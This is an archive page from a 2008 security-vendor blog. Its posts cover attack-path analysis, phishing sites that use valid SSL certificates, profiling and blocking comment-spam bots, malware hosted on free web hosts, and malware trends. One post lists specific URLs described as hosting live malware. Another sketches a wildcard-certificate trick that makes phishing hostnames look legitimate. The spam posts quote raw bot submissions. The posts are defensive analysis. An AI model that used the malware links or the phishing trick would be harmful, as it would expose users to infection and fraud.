Friday, December 26, 2008

You Gotta Stop Them Somewhere

Let's say you've established some security objectives, including "Keep an attacker who controls Internet web sites my employees visit from denying my employees access to my corporate information." How can you tell whether the product you're considering will help you meet your goal?

In theory, it's pretty simple: for a set of controls to give you the security benefit you are looking for, there needs to be at least one control blocking every possible path from what the attacker can do before he attacks (control Internet web sites your employees visit) to the thing you really don't want him to do (stop your employees from accessing your corporate information). If there is a path on which nothing stops the attacker, you have a security vulnerability, which means you need to change either your goals (maybe they're too aggressive for current technology to support), the system architecture, or the set of controls you're using. If there are paths on which multiple controls stop the attacker, you have defense in depth; how much depth is good depends on your level of paranoia and the performance, administrative and financial costs you are willing to put up with.

In practice, when you're trying to use security controls to meet a minimum bar, the hard part is knowing what paths are available for an attacker to take. Each path is made up of individual steps, each of which has starting and ending privileges. There are 3 kinds of steps to consider:

  • By Design: the system is designed to provide someone with privileges S with privileges E.
  • Design Side-Effects: it didn't necessarily need to be this way, but the system is designed such that someone with privileges S can automatically get privileges E.
  • Implementation Flaws: someone with privileges S can get privileges E even though the design of the system does not allow this step

I find it quickest and most enlightening to start at both ends (the attacker's starting privileges and your anti-goals for the attacker), and enumerate the endpoints of steps in each category.

Let's start at your anti-destination for the attacker, denying employees access to corporate information. You may think that because this is a denial of service threat, you didn't design your system to enable it at all, but chances are good you can get a pretty good list from your departing employee process.


My system is designed to prevent [ex-]employees access to corporate information when:
The user's account is deleted from LDAP.
The user's account is deleted from the 'employee' group.
The user's password is changed.
Ownership of a file formerly owned by the user is changed.
Files owned by the user are deleted.
...


Because these things have to work for your sysadmin when an employee leaves, they would also work for an attacker, if an attacker could do them.

To get a list of design side-effects an attacker could use to prevent an employee from accessing corporate information, try inverting the table of contents of your disaster recovery plan (or, if you don't have one, the categories in your IT help desk ticketing system). You know if any of these conditions are true, your IT crew is going to scramble because employees won't be able to get the information they need. This is true whether it happened by accident or an attacker did it to you on purpose.

This leaves us with implementation flaws. You can't really list these unless you are running known-vulnerable software. Presumably if you knew you were running vulnerable software, you would patch it, so let's not try to create this list directly. Instead, list the components which have the permissions to do things in the first 2 lists. If these components were vulnerable (in the right ways), an attacker who got far enough to reach the vulnerable interface could exploit them and presumably accomplish the original threat.


An attacker may be able to prevent access to corporate information when:
A vulnerability in the LDAP server allows an attacker to delete user accounts, change group membership, ...
A vulnerability in the file server allows an attacker to delete files, change file permissions, overwrite files, ...
A vulnerability in the user's desktop allows an attacker to prevent the machine from booting, delete applications, delete files, change file permissions, overwrite files, change the user's password, ...
...


Now, start from the other side. If an attacker can control an Internet site your employees visit, what can he do by design?


A web site my employee visits can:
Set or delete cookies for that site on my employee's desktop.
Redirect the employee's browser to another Web site.
Run javascript in the user's web browser in the context of that site.
Run java applications, signed ActiveX controls, …
...


What can he do as a design side-effect?


A web site my employee visits can also:
Respond to a single request with more than one response.
Persuade my employee to run damaging commands or executables.



What could he do as a result of implementation flaws?


A web site my employee visits can:
Take advantage of any security flaw in the employee's web browser or plugins.


In the middle, for any given potential connection you can have one of three things: a working path for the attacker, a control that blocks the attacker's path to your anti-goal for the attacker, or something more fuzzy (usually including the word "may"). If there are any working paths for the attacker that traverse only steps that are by design, you have a requirements conflict and it will not be possible for technological controls to meet the security objective you have in mind unless you change your requirements. For any other working path, you need to find a control that will break a link. Or, going the other way, to be complete, the set of controls you are considering must break at least one link in each otherwise-working path. Probably to get this effect, you will need to combine controls from multiple sources. If a set of controls doesn't break any links in any attack paths you care about, don't buy it.

From the above partial lists, there is a pretty clear connection between an attacker being able to take advantage of security flaws in the employee's web browser and the consequences of a vulnerability in the user's desktop: the web browser runs on the user's desktop, so a security flaw in the browser would mean the attacker with control of a web site visited by the employee can deny the employee access to corporate information, violating this security objective. There is an equally clear connection between social engineering the employee into opening malware and violating this security objective. The latter connection, because it doesn't involve any implementation flaws, is more serious, and it would be prudent to mitigate it. You could, say, compare the effectiveness of user-education programs, desktop anti-virus, and an HTTP malware scanner (my money, hopefully obviously, is on combining the desktop AV and the HTTP scanner, because people will click on anything).

Because the fuzzy paths say "may", you get some leeway in deciding whether you think there is a working path for the attacker to follow from his starting privileges to the things you don't want him to do. If you have no known working attack paths, you might consider reducing risk in these areas (e.g. by instituting an aggressive monitoring & patching policy, or buying a product which attempts to defend against relevant 0-day attacks) before adding depth to your defenses in other areas.

--Brenda

Monday, December 22, 2008

Money magazine's take on phishing

The January 2009 issue of Money magazine published a quiz entitled "Are you Phish Food?" The purpose of the quiz was to gauge your knowledge on whether you are being targeted for a phishing attack. If you don’t get the print magazine, you can take the quiz online too.

Overall the quiz is basic, but that’s acceptable given the target audience (general consumers). It's nice to see articles like this, as consumer education about security threats still has a long way to go (but we're making good progress: most consumers now know, even if they do not understand why, that they need some kind of anti-virus protection on their systems). There was, however, one question that made me cringe a little.

The question was whether using HTTPS was a good or bad thing, and Money's response was that it was a good thing assuming the SSL certificate is valid (which they explain as the little lock icon in the browser not reporting any problems). In other words, if the URL is using HTTPS, and the certificate is good, then don't worry--you're safe. This is actually a bit misleading.

In this day in age, basic SSL certs are tied to hostnames (or, in the case of wildcard SSL certs, root domain names). The process of vetting SSL cert recipients has diminished over the years; nowadays you can be immediately issued a domain-only SSL cert if you control the web server for that domain. In fact, this diminished accountability for normal SSL certs is one of the reasons for the introduction of the newer crop of EV (Extended Validation) SSL certs (a.k.a. the 'green bar' SSL certificates). EV SSL certs (re-)establish a level of recipient review and validation.

Anyways, let's bring this back to phishing. Money magazine says that a valid HTTPS cert means things are OK. But what's to stop a phisher using 'www.evil.com' from getting a valid SSL cert for that hostname? Absolutely nothing, other than the financial cost acting as a barrier to entry. But domain-only SSL certs are now as cheap as US$15, and I have to imagine such a cost is negligible if the phishing site has even a minimum level of success. Sure, phishers treat their sites as disposable, and buying a new SSL certificate for every site could become expensive; but if valid HTTPS connections contribute to the success of the phishing attack, then there might justifiable ROI. At that point, the SSL cert is just a cost of doing business for the phisher (or, as I like to refer to it, a 'cost of doing evil').

But let's take this one step further. Getting an SSL certificate for www.evil.com has minimal value, because it is very clearly evident that www.evil.com is not a possible phishing target, such as www.paypal.com. And perhaps every certificate authority (CA, the people who sell SSL certs) in the world checks and denies SSL certificate requests that include derivations of the word 'paypal' in their SSL certificate requests...although that is highly doubtful. But even if they did, wildcard SSL certificates can bypass this check to a certain degree. An attacker would just purchase a '*.evil.com' wildcard certificate from the CA, and then set up a site such as 'paypal.evil.com'. The CA would never know the final hostname in use. Does the hostname still look suspicious? What if the attacker gets the domain name 'cgi-bin-webscr.com', and requests a wildcard certificate for '*.com.cgi-bin-webscr.com'? The SSL-validated URL "https://paypal.com.cgi-bin-webscr.com/?cmd=login" could look convincing to some folks...

And just for fun, I took at look at all of the reported phishing sites on Phishtank.com for the past month. There was only one site using HTTPS; it was posing as an eBay site, and it did, in fact, have a valid SSL certificate issued for the phishing domain name. So this discussion isn't speculation...it's actually occuring.

Overall, the mere presence of a valid SSL certificate does not imply a safe site. You could, in fact, be (securely) talking to an attacker. EV SSL efforts help with this situation, but they are cost-prohibitive for many sites and will take a long time before the majority of the world is using them (if ever). So end users must still remain vigilant about verifying which sites they are visiting...and the presence or absence of a standard valid HTTPS/SSL certificate is a negligible factor in that process.

Until next time,
- Jeff

Final encounters with a web comment spammer

In the last part of my series on web comment spamming applications, I want to pass along a few things I noticed that were effective at separating the spam apps from the humans. Many of these have been publicly discussed already, but they still are worth repeating. Also, note that none of these techniques provide a permanent, fool-proof way to stop spam apps. These suggestions will curb the tide of comment spam that is being spewed by today’s spam apps--but tomorrow's spam apps, if adapted, would be able to circumvent these mechanisms. Anyways, onto the mechanisms.

Use Javascript
All of the spam apps I've encountered to date do not run Javascript. So you should utilize some Javascript mechanism to manipulate the form before it is submitted. You can dynamically change the form action URL upon loading or submission, update the value of a hidden field to indicate Javascript is present and functioning, etc. Any submission to the wrong form action URL or without the proper hidden field value should be discarded.

The downside of this approach is that it requires the user to have Javascript enabled in their browser. While Javascript is mostly ubiquitous in the Web 2.0 world we live in, browser plugins like NoScript are still highly popular. So you have to make the executive decision on whether you want to require your users to enable Javascript to use your form...which might not be a problem if you already require it for other things (i.e. Web 2.0 elements in use on your site).

Monitor the time it takes to fill out the form
My simple experiment kept track of the time between when a spam app requested the form to when the form was submitted. What I saw was that the form submission was done immediately. There is no way a human would be able to reasonably fill out the fields of the form in under, say, two seconds. This provides a simple way to discard spam simply by keeping track of when the form was requested (via a time value stored in server-side session storage or within a hidden form field) and when the form was received by submission (compare current time with previously stored time).

Now sure, spam apps can get around this by slowing down a bit during the form submission process. But since these apps are trying to spew out tens/hundreds of thousands of spammy form submissions, requiring each submission to slow down causes significant time overhead for the user of the spam app. Are they willing to be patient and wait 10 times longer for their spams to be submitted?

Use CSS to hide some form fields
The spam apps liked to populate every text input field in the form with some kind of value. You can wrap a field in a HTML DIV with a CSS style set to 'display:none', which essentially makes the field invisible. Normal CSS-capable web browsers will not display the field, so the user will never get a chance to enter input data into it. But the spam applications do not account for the hidden DIV, and thus will treat it like any other field on the form (and input a value). Thus all you need to do is see if that invisible form field contains a value upon submission, and if so, discard the submission. For safety, put a nice warning (also in the DIV) to users that they should not fill out the field if they see it; that way, if for some reason a user has a browser which is not CSS-compliant, they are still prompted to leave the field blank.

Textarea input field in HTML comments
I noticed one of the spam apps that hit my form just couldn't resist the temptation of populating data into a textarea input field that was within HTML comments. Normal browsers will ignore everything in comments, including the erroneous textarea field; so any submissions that include that field should be discarded as spam.

Don't use obvious form field names
Avoid using the field name 'email' for a user's email address, etc. In fact, you can turn this to your advantage: have the email field be named 'foo' or something else innocuous, and then check upon submission that the 'foo' field data format matches the format of an email address (which is typically done for validation purposes anyways). Since the spam apps often shove random garbage into fields they do not understand, you can discard any submission that does not contain what looks like an email address in the 'foo' field. Alternatives include checking numeric format in postal code or phone number fields, etc.

Overall, these few simple tricks can help you alleviate the flood of web comment spam that your site might be experiencing. They may not be perfect, but they are simpler to implement than a CAPTCHA and do provide some value from the current crop of web comment spam apps that are roaming the Internet. Every little bit helps.

Until next time,

- Jeff

Saturday, December 20, 2008

Ask Why Until They Slap You

As I mentioned last week, real benefit is subjective. I would derive no benefit whatsoever from tickets to a football game. Curling, on the other hand, is intriguing; attending a curling match would benefit me a great deal. In this case, based on the relative sizes of the curling and football industries in the United States, I am almost certainly in the minority. What meets one person's needs perfectly may not do a thing for someone else.

Furthermore, attending a curling match would benefit me because I like observing human, real-time approaches to infinitely variable analog control problems, whereas someone else might benefit by the opportunity to cheer for her son, who is playing on one of the teams. Which is to say, a single solution can have very different benefits for different people.

So how does one tell if, say, a security SaaS provides real benefit? If you're considering a security product, the steps go:
  1. Decide what you actually need.
  2. Determine whether the technological controls provided by the solution you are considering will get you that.

Those are both pretty big topics, so this week, let's delve into deciding what you actually need. Erik Simmons, Intel's requirements guru, has a surprisingly effective suggestion for eliciting the real requirements: Ask why until they slap you.

Requirements Guy: Why do you want to buy a product that filters bad HTTP stuff out?
Customer: Because I don't want my employees running malicious Javascript, installing Trojan horses, catching viruses, ...

Vendors in conversation with potential customers would probably stop here if they do everything mentioned (which of course we do), since being slapped by your customer is not what most people set out to do in the morning. But you, evaluating us, should not stop.

Requirements Guy: Why not?
Customer (giving Requirements Guy a funny look): Because that would be BAD! Everyone knows that!
Requirements Guy: Why would it be bad?
Customer (enunciating very clearly & speaking louder and louder): My employees would be unable to get any work done. My IT department would need more people to clean up the mess. My super-secret company data would go flying off to the four winds and all the regulatory agencies that apply in my line of work would shout at me. My name would be on the front page of the Wall Street Journal!

Requirements Guy is getting warm. He has unearthed several underlying concerns that are candidates for what Customer actually needs. But right now, only one of these concerns (people outside the company getting a copy of confidential corporate data) refers to an asset that can be directly manipulated by a computer. He needs to keep going to nail down the other concerns in a way that is useful for considering security benefit. Let's do one more.

Requirements Guy: Why wouldn't your employees be able to do their work?
Customer: Their computers wouldn't work!
Requirements Guy: Why would that stop the employees from getting their work done?
Customer: Their computers are the only way to get at all the corporate information they have to look at and create.

This time, Requirements Guy should really stop: one more why, and he's done for. He has an underlying asset (corporate information) and concern (availability), so let's say that the second concern this customer cares about is availability of information. You would need to follow up those other leads until you feel you've covered the important things you need.

Security can't ever give you the whole benefit you're looking for, only stop attackers from taking the benefit away. Therefore, to finish defining the security benefit you're looking for, you need one more thing: an attacker. For this purpose, the important part about an attacker is: before they start attacking, where are they in relation to your system and what can they already do? In this case, let's say you are expecting an attacker on the Internet (a good idea), and you assume he can control content on Web sites your employees visit. You would need to keep following leads to come up with a complete list of attackers you care about. For now, the benefit you are looking for becomes "Keep an attacker who controls Internet web sites my employees visit from denying my employees access to my corporate information." This is not going to be the only security benefit you want, but I'll use it as an example next week when I talk about figuring out whether controls a vendor offers make the benefit you want possible.

Now let's suppose I'm Zscaler. As a security SaaS, how do I ensure that I'm providing real benefit? The steps go:
  1. Derive the underlying concerns of a substantial set of my customers or prospective customers.
  2. Ensure the technological controls I provide can be configured to meet those underlying concerns in the space I've set out to protect.
This doesn't mean the controls can't do anything else, but it sets a minimum bar for the benefit provided by the controls. This, I'm happy to say, is exactly what Zscaler is doing; the hypothetical customer scenario above is one example.

--Brenda

Thursday, December 18, 2008

Turning a Blind Eye

All too often, evil is lurking right under our noses, yet we choose to turn a blind eye. Sometimes we do this out of fear. After all, if we get involved, we too could get hurt. Other times however, we are just as much to blame as the guilty parties perpetrating the crime. We choose not to get involved because we too profit from the crime, although we do so passively and leverage that as our defense.

A couple of years ago, I drew attention to the fact that free website providers were profiting from allowing phishers to set up shop and doing nothing to stop them. They were profiting as they make money from ad-supported pages. The more traffic they generate, the more money they make and how that traffic is generated doesn’t seem to be of concern. I ruffled a few feathers by speaking my mind and generated a much-needed debate on the issue. The argument from the hosting providers was that they try very hard but some pages slip through the cracks. Although I don’t buy the excuse, to be fair, automating the detection of phishing pages isn’t without challenges. What about malware then? Do these same sites foot the bill for hosting/delivering malicious binaries? Sadly, the answer is yes.

Being an ‘in-the cloud’ security solution, our Zscaler infrastructure permits powerful data-mining capabilities from a research perspective. The very nature of a cloud architecture means that logs can be centralized, providing a powerful view into global attacks. Leveraging this capability, I sought to identify malware being hosted on free web sites. It didn’t turn out to be much of a challenge as evidence was everywhere. A sample of what was discovered can be seen below:

Caution: At the time of this blog post, these URLs were live and hosting malware – proceed at your own risk.

Geocities (Owned by Yahoo!)

http://www.geocities.com/sltap/main.htmlhttp://uk.geocities.com/dravidaperavai/
http://www.geocities.com/SiliconValley/Hills/7140/
http://www.geocities.com/dental_associates/
http://www.geocities.com/jennifer_garner_zone/trivia.htm
http://www.geocities.com/aga_muhlach_2000/r.html
Tripod (Owned by Lycos)

http://india_resource.tripod.com/indianhistory.html
http://members.tripod.com/~INDIA_RESOURCE/Shia-Plight.html
Angelfire (Owned by Lycos)

http://www.angelfire.com/tx5/jr2k/Stor/2.html
How difficult would it be for these providers to have identified the malware that they are hosting? It would have been trivial. The files are hosted on machines they control and we’re not talking about 0day attacks here. In every case at least 20+ commonly available AV scanners detected the malicious content and in some cases the malware was years old! This isn’t just incompetence, it’s gross negligence.

So why then wouldn’t they make an effort to eradicate viruses from their servers? The answer is simple. The cost to do so outweighs the benefits derived. In other words, removing content from their sites reduces the number of eyeballs they receive and in turn decreases ad revenue. They are turning a blind eye to the fact that their users are getting infected with malware.

Gross negligence can be defined as “failure to use even the slightest amount of care in a way that shows recklessness or willful disregard for the safety of others”...sounds like an open and shut case to me.

- michael

Saturday, December 13, 2008

Avoiding Snake Oil: SaaS Challenges

It can be awkward to talk to other security geeks between when you accept a job at a startup and when you have worked there long enough to figure out what is actually going on:

Other Geek: What do they do?
Me: Client security using a SaaS model.
Other Geek: How does that work?
Me: They filter the traffic between the client and whatever it's talking to on the Net. It's cool because the customer configures stuff once for all their sites (clicky, clicky) instead of having to install & configure a bunch of boxes at each site. Plus it can protect people working from coffee shops.
Repeat Indefinitely:
Other Geek: Completely reasonable questions about successively more detailed engineering and business concerns, all of which boil down to "How could that possibly work?"
Me: Increasingly vague hand waving, as the questions proceed further and further away from my limited knowledge of what my soon-to-be employer actually does.

The only plus side of conversations during this period is, you know you aren't revealing anything secret, because you don't know anything yet.

As I finish my first week of work at Zscaler, I have a lot more idea of what is going on, and I have acquired my first self-assigned mission: making sure that what we are selling is not, and never becomes, snake oil, whether or not all other available solutions are unctuous or reptilian. Because of our line of work I'd say we have some risk in this area (as many of my friends and acquaintances were keen to point out), and I'm not too worried about ensuring we are the best available solution, since plenty of my coworkers are focused on that.

I see 3 keys to avoiding snake oil, from a vendor's perspective:

Accurate customer expectations
The customer must understand what to expect, and their understanding must match what is actually going to happen. Since the vendor knows what is actually going to happen, the vendor has to make sure the customer has the right impression. This is tricky for any security product. As security people know but other people would usually rather not hear, 100% protection is not possible. To make things worse, 90% protection doesn't mean anything, since even within the security industry there is no simple, well-understood metric for describing how much protection a particular product provides. Security people would normally describe specific kinds of protection provided and the strategy for implementing each, but non-security people don't have the background to understand what this implies for them. And because each situation is different, the security people need more information about each customer to be able to explain the implications.

Real benefit
The product must actually do something to protect the customer in ways that matter. Since real benefit can be in the eye of the beholder, security vendors need to consider benefit from the viewpoint of a hypothetical security-knowledgeable customer; a representative such person may or may not exist. Some things are clear: it is valuable to protect against attacks that are actually occurring and would have worked if the product hadn't stopped them. It is less clear whether protecting against attacks that are still theoretical is worthwhile. It is also apparent that the scope of protection must cover gaps in other protections the customer is planning to use. This is a challenge for security as a service today, because a SaaS model implies a new way to partition the problem, so existing products may not mesh well. On the deeply unclear side: for non-security people, it isn't about viruses, botnets or cross-site scripting, it's about somebody erasing important data, clogging the network, stealing intellectual property, and so on. But protection tends to be organized by security geeks, i.e. by class of attack it defends against. Whether protecting against viruses, but not botnets, is enough to be valuable depends on customer expectations and scope considerations. Finally, the lack of metrics applies here, too: currently it is very difficult to quantify how much protection is enough.

Verifiable benefit
The customer must be able to verify that they are actually being protected in the way they expect to be protected. This can be tricky for the same reasons setting accurate customer expectations is tricky, but for an in-the-cloud security service, it is even harder. After all, in the ideal world, a customer is protected but not inconvenienced, i.e. the customer never notices the service. In most cases, all a customer has to go on is the vendor's word that protection has taken place. Certainly security in the cloud is blacker than black box: a would-be tester doesn't even have a box to play with directly, and the box is intended to change regularly without warning or customer intervention. Few companies are paranoid and wealthy enough to employ skilled security folks to set up an ongoing independent monitoring system. In this situation, it will be tricky but even more important for vendors to supply an answer beyond the infamous "trust us, we know what we're doing".

Until now, I've always been on the other side of the fence, poking at products and determining whether they live up to my exacting standards. The view is a little different from over here, but I feel confident. Keep watching and we'll all find out how Zscaler meets these challenges.

-- Brenda

Friday, December 12, 2008

Overweight Thin Clients

I remember the dawn of the new millennium well. The Internet boom was in full swing and we were predicting the death of the PC. Fat-client machines would no longer be needed in an Internet driven world as people would require only an Internet capable device to access everything they had ever dreamed of. Companies like Netpliance quickly jumped on the bandwagon, offering cheap Internet appliances such as the i-Opener. The game plan was to take a loss on hardware and recoup the cost by selling Internet services. Many agreed that this was the future, but after only a couple of years in business and a measly $230,000 in sales, the writing was on the wall - we weren't ready to give up our beloved PC. Netpliance became TippingPoint and the days of the 'Internet toaster' were...well...toast.

Cloud computing has once again promised a world in which thin clients will rein supreme - all data and processing will occur in the cloud so you'll only need a basic device with minimal processing power. This time around, everyone is jumping on the netbook bandwagon - cheap, mini-laptops with minimal processing power. Is it a fad this time as well, or are we finally ready to turn in our PCs?

Interestingly, browsers are moving in the opposite direction. They've been suffering from feature bloat for a while now (email clients, RSS readers, etc.), but now we're actually changing the architecture of web applications to push data and processing to the client. Adobe Flash has been around forever but the Rich Internet Application room is now getting pretty crowded with the likes of Google Gears, Microsoft Silverlight, JavaFX, etc. Google has also recently released Native Client, an effort to run x86 native code in web applications. All of these projects are blurring the line between desktop and web applications.

Is this a good thing? Time will tell. Does it present new security challenges? Certainly. Applications are becoming increasingly complex and distributed. This always raises the bar and makes makes security a greater challenge. We're no longer dealing with simple static HTML. Now we may have interpreted scripts alongside compiled binaries, all of which are sitting on different machines and may well include untrusted code written by a third party. Webapp security has gone from being a profession for those who didn't have the time/skill/interest in learning reverse engineering skills to the cutting edge of security and suddenly, those RE skills are starting to look pretty valuable once again. Another security issue involves pushing data to the client for storage and processing. It's relatively easy to secure data on a server (we finally seem to be getting a handle to the SQLi thing...after a decade of preaching), but it's a different story when data sits on every client. Developers must take great care in deciding what is pushed to clients as the gloves come off any time you no longer have control of the device where sensitive data resides. Will developers understand the security challenges of this new architecture? History suggests that it will simply open another chapter in the many challenges which we face in enterprise security.

So what will it be - streamlined thin clients or powerful workhorses? What does the future have in store for us? As a guy that just can't help but buy the most powerful device available, I expect that client side storage/processing has just started to evolve - netbooks on the other hand may well go the way of the Internet toaster.

- michael

Wednesday, December 10, 2008

Third encounters with a web comment spammer

In my previous two posts, I wrote about a web comment spam application that has been hitting one of my personal web sites. I set up a bit of an agility test for the bots to figure out what they were, and were not, capable of doing. Eventually I was able to put together a fairly good operational profile of one of the spam application's functionality. In this post, I want to review the operation of another spam application that I happen to encounter during my test...one that seems far more capable than the original one I aimed to report on.

To briefly recap my previous two articles, there was one particular application that repeatedly kept visiting my site. It should send a bunch of bogus links in various different formats as a comment in a web form; since the links were entirely random, I hypothesized that these submissions were mere probes to some other future means and not the overall end purpose. Anyways, the operational profile that I constructed for the application looks like:


  • It recognized a few form field names and attempted to submit appropriately formatted data to them, but all other fields were filled with random garbage (unless an existing form field already held a value); specifically:

    • It put an email address in the 'email' field, but not the 'eml' field

    • It put a URL in the 'url' field, but not the 'link' field

    • It did nothing special with the name, address, and phone fields

  • It supported cookies during the submission process

  • It did not support Javascript

  • Hidden form fields were properly submitted/included

  • It could support multi-step submissions

  • The User-Agent seems configurable, but is mostly left as the same value

  • Many uses of this application against my site have originated from the same Class C public Internet network

During my experiment, another spam application wandered onto my site and partook in my little agility test. This particular application stood out exceptionally different than the previously profiled application. Here’s an example of what the application actually sent (which can be compared against the raw data contained in my previous post). I’ve modified the domain names; I assure you the originals used live/real URLs.

eml: korch_poposk@xxx.yy

email: korch_poposk@xxx.yy

name: DoorieHoohona

phone: 123456

address: http://xxx.yyy.com/Avalide/map.html

url: http://xxx.yyy.com/Bust-Enhancer/map.html

link: http://xxx.yyy.com/L-Glutamine/map.html

comment: Wellbutrin XL what is celebrex clonidine medicine bupropion and weight loss <a href=http://xxx.yyy.com/Female-Libido-Patch/new-scientist.html>new scientist</a> <a href=http://xxx.yyy.com/Evegen/evegen-reviews.html>evegen reviews</a>... [truncated for brevity]

Just looking at the values submitted in these fields, there is a night-and-day difference when compared to the previously mentioned spam application I was tracking. This new application was significantly more successful at putting contextually-correct information in the right fields: email addresses were submitted for both 'email' and 'eml' fields; something that resembled an actual human name was submitted in 'name' field; the 'phone' field was numeric; both 'link' and 'url' fields held URLs. The value of the 'address' field is debatable...perhaps the application is coded to believe 'address' is akin to a web site address, i.e. URL. Or, maybe this particular app shoves URLs into fields it does not recognize (and thus the URL values in the 'address', 'url', and 'link' fields were actually just dumb luck). The links submitted within the comment only used one format (proper HTML <A> tag), so it's not as robust as the other application in abusing web applications that allow the use of popular forum code markup (i.e. the [url] and [link] pseudo-tags). But overall, the level of contextual awareness of this application is far more interesting than the previously profiled spam application.

So the current operational profile of this spam application is:
  • It has shown to be very successful at putting the right contextual/formatted information into a variety of different form fields; specifically:

    • It put email addresses into the 'email' and 'eml' fields

    • It put a human name into the 'name' field

    • It put a numeric number into the 'phone' field

    • It put URLs into the 'address', 'url', and 'link' fields

  • It supported cookies during the submission process

  • It did not support Javascript

  • Hidden form fields were properly submitted/included

  • The application does not appear to support multi-step submissions; or at least, it didn't care about verifying that the submission worked

  • The User-Agent string submitted is extremely easy to spot: "Mozilla/4.0 (compatible; MSIE 6.0; Update a; AOL 6.0; Windows 98)"

Unfortunately this particular application only visited my site once, so I don't have multiple submissions at hand to aggregate into a more comprehensive profile. I'll sure be on the lookout for the next time it comes back around.

Until then,
- Jeff

Tuesday, December 9, 2008

The Malware Tea Leaves

When parents want to know what's cool, they turn to the experts - their kids. Parents are shielded from coolness by structure and routine. They've worked hard to establish a delicate balance between work, family and finances and the last thing they want is change. Kids on the other hand are unencumbered by structure and quickly adapt. What was trendy yesterday is passé tomorrow.

By the same token, if we want to identify trends in technology, we should not look to large corporations, saddled with policy and bureaucracy. Even start-ups, while nimble, have to play by the rules. Malware authors on the other hand are completely unencumbered by rules, legal or otherwise. They provide a unique window into technology trends. When the koobface virus was adapted last week to target Facebook users it garnered significant press for attacking a popular social networking site. I on the other hand was intrigued not by the targeted site so much as the koobface author's decision of communication medium. Koobface, like most malware today relies on social engineering to spread. In this case it attempts to convince the victim that their system lacks a particular codec which is required in order to view a video. Once the user downloads and installs the malicious binary, they're infected. Such attacks have historically relied on email to spread and entice new victims. Koobface reveals the shift that we are experiencing in the way that users prefer to communicate. A co-worker recently mentioned to me that he was forced to create a Facebook profile, not because he wanted to, but because it was they only way that he could stay in touch with his niece and nephew - they didn't use email - they didn't need to as they lived in a social networking world. The author of koobface has realized this as well. Email is tired and Facebook is wired.

So what do the malware tea leaves reveal?

Email is Old School - Why send a static message when you can participate in a vibrant conversation, social networking style. Don't expect email to disappear but do expect webmail to be increasingly preferred over traditional email clients. Alternate communication mediums such as social networks, Twitter, etc. also present avenues for compromise and data leakage.

HTTP Consolidation - Malware increasingly uses port 80 as a communication channel, regardless of whether or not the traffic is HTTP. Why? Outbound ports 80 and 443 are always open on corporate firewalls. Intelligent networking applications such as Skype will also try a number of tricks before ultimately reverting to communication on port 80 for this same reason. If you're solely relying on traditional firewalls for protection, you're exposed. Perimeter security applications need to be 'application aware' - ports are meaningless.

End User Empowerment - The Internet was supposed to do away with the desktop and leave us all with thin clients. However, the power of cloud computing has had an unanticipated side effect - it has empowered end users. You no longer need the IT department to deploy a new solution. Instead, you can setup an online account and be up and running in minutes, all without assistance from the techies, or perhaps even without approval. Attackers are all too aware of this and have over the past couple of years significantly shifted their attacks from the server to the client. The defenses are lower and valuable information is either stored there or it's an easy way to grab some authentication credentials and get the goods that live in the cloud.

Who says an old dog can't learn new tricks? Pay attention to patterns in malicious software, there's always something driving a new trend and we can learn a great deal from it. Want to identify the next big thing? Ask an attacker and while you're at it check with your kids before updating your wardrobe.

- michael

Monday, December 1, 2008

Second encounters with a web comment spammer

Earlier I wrote my First Encounters with a Web Comment Spammer piece. In that piece I devised a plan to lay a trap of sorts for the web comment spamming application, in order to test the depth of the application's functionality. Well, it's been a few weeks, and now I have some data to share.

The most interesting thing to note is that a few more comment spam applications/crawlers have made their way to my comment form. These new ones exhibit different behavior than the original one I reported on, thus I believe they are entirely different applications. For now, I’m going to stick to the original application I previously discussed; I'll compare my results to these newer spam apps in a future blog post.

One thing I noticed is that many of these comment spam attempts were coming from systems located on the 94.102.60.0/24 network. A large number of them were also using the User-Agent string "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)". Both of these factors turned out to be good indicators of whether the request was coming from a spam bot.

Anyways, here is an example of one submission I received. The names at the beginning of each line are the name of the form field; all of the fields are text input fields (as in, "<input type=text>"), except for 'other' and 'comment' which are textarea fields.

eml: YkfxeDeZjHR
email: fbkixy@nphddy.com
name: fvkijvn
phone: CdGpbMFbxGDygCwy
address: ouUMHxpoxwn
url: http://vfokgivkywst.com/
link: geEKiJfvkyRC

other: TyhYgb <a href="http://xnhqpiemubkx.com/">xnhqpiemubkx</a>, [url=http://fiukrdabbaut.com/]fiukrdabbaut[/url], [link=http://zrywxdmvlfzv.com/]zrywxdmvlfzv[/link], http://klhtciqjlkxr.com/

comment: TyhYgb <a href="http://xnhqpiemubkx.com/">xnhqpiemubkx</a>, [url=http://fiukrdabbaut.com/]fiukrdabbaut[/url], [link=http://zrywxdmvlfzv.com/]zrywxdmvlfzv[/link], http://klhtciqjlkxr.com/

The most obvious things visible from this data are that the application filled in all fields with random garbage. It managed to put something that resembled an email address into the 'email' field, but not the 'eml' field (which is the actual email address field shown to the user for data entry). The application also managed to put a URL into the 'url' field, but not the 'link' field. This makes me believe the application is pre-programmed with a few specific field names where it will submit data of a specific format. Also interesting/notable is that the application submitted the same blob of link garbage to both textarea fields ('other' and 'comment'), and not any of the text input fields.

In addition to the form fields that were submitted, I collected some other pieces of information to gauge the depth of the spamming application. I discovered that cookies were indeed supported--at least, I could set a cookie on the form display page and the bot would carry that cookie over with the form submission. Hidden form fields were not altered and properly submitted with the rest of the form data. I also found that Javascript is not supported by the application...which is no surprise.

Another thing I failed to notice before is that the application does actually have the ability to handle multi-step submissions. I recognized the behavior in my logs: whenever the form was submitted, the same user-agent would then go through every link on the page (in exact order of appearance, none-the-less) and subsequently request it. I assume this behavior is to deal with web applications that return a "thank you for your submission" page along with a link taking you back to the forum/comment area where the new submission will appear.

Interesting info, perhaps. But I’ve found that I grown bored with this particular application and its lack of intelligence; the newer bots I’ve been seeing have actually been doing a lot more interesting things. I will take a deeper look at these new bots, and how they differ, in my next blog post. After that, I'll share a few effective tricks I've been using to tell these spam bots apart from the humans (without CAPTCHAs!).

Until then!
- Jeff

Wednesday, November 26, 2008

Clickjacking - iPhone Style

In the past, I've blogged about clickjacking and how to defend against it. While Adobe has patched Flash Player to protect against one of the more frightening attacks, which could lead to hijacking of a victim's webcam and microphone, many browsers and applications remain vulnerable. In fact, a few days ago, when Apple released the latest firmware for the iPhone (v2.2), it turns out that they quietly addressed what some consider to be a clickjacking vulnerability in Mobile Safari, the iPhone's web browser. It's definitely a different version of clickjacking and it would be fair to argue that it's a different vulnerability altogether but it is interesting nonetheless, so for the sake of argument (and blog hits) I'll stick with the clickjacking title and describe in greater detail the unique aspects of this vulnerability.

